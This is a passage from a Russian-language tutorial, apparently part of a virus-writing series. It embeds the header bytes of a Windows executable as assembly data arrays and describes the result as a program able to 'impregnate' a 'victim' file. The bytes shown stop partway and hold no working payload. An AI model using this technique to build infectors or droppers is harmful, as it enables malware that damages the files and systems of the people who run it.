_fileDAT_0 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
_fileDAT_1 db 77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0
_fileDAT_2 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 176, 0, 0, 0
_fileDAT_3 db 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111
_fileDAT_4 db 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0
_fileDAT_5 db 93, 101, 253, 200, 25, 4, 147, 155, 25, 4, 147, 155, 25, 4, 147, 155, 151, 27, 128, 155, 17, 4, 147, 155, 229, 36, 129, 155, 24, 4, 147, 155
_fileDAT_6 db 82, 105, 99, 104, 25, 4, 147, 155, 0, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 34, 94, 113, 64, 0, 0, 0, 0
_fileDAT_7 db 0, 0, 0, 0, 224, 0, 15, 1, 11, 1, 5, 12, 0, 2, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0
_fileDAT_8 db 0, 32, 0, 0, 0, 0, 64, 0, 0, 16, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0
_fileDAT_9 db 0, 64, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0
_fileDAT_10 db 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 32, 0, 0, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
_fileDAT_13 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
_fileDAT_14 db …

Как видно, строки по номерам идут не по порядку. Вносить же в тело программы строки нужно строго по порядку. Проделывая эту работу, Вы увидите, сколько пустого места хранится в обыкновенной exe-шке. Это, я думаю, познавательно : )
Из файла f_to_dw.txt, путем складывания последних цифр каждой строки, можно узнать объем нашей exe-младенца.
Итак, наша программа теперь может оплодотворить, и “жертва” может “родить”. В следующей статье мы рассмотрим полный (но всё-таки подчищенный для учебных целей) исходник. До свиданья.

Перечень используемого программного обеспечения:
[1.1] - file2sc.exe - программа формирования исходников из файла (http://www.danil.com.ua)

Исходник
 

[C] _follower / TPOC
